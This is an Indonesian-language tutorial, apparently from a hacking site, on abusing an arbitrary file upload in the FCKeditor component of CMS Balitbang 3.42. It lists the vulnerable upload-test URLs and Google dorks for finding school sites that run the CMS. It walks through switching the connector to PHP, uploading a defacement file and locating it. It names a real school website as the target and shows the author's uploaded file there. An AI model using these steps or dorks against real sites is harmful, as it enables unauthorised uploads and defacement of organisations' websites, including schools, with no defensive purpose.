CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Inveet.id rwxr-xr-x 1 03.50

Filename	CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads
Permission	rw-r--r--
Author	Inveet.id
Date and Time	03.50
Label
Action

[-] CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads


[-] Exploit :




http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html

[-]Dork : 




inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

Pertama , Kita Cari Target digoogle dengan memasukan dork diatas .

tersera kalian mau coba dork yg mana .

kemudian pilih salah satu site dari google tadi :

Example : http://www.smkmuh7gdl-malang.sch.id

Langkah selanjutnya , kita masukan Exploit di Target Tersebut :

Example : http://www.smkmuh7gdl-malang.sch.id/editor/filemanager/connectors/test.html

sekarang , setelah masuk
Ganti Connector ASP → PHP

Lalu , Upload File txt kamu ,
oh iya , file HTML gak bisa lo , hanya file TXT yang bisa

setelah upload , dimana tempatnya file kita tadi ?
itu mudah , langsung saja masukan

http://public_html/userfiles/file/file-deface.txt

http://public_html/userfiles/file-deface.txt 

dan ini hasil saya tadi

http://www.smkmuh7gdl-malang.sch.id/userfiles/file/test.txt

sekian copasan saya , silakan berexplorasi sendiri ya

Thanks : Oka1302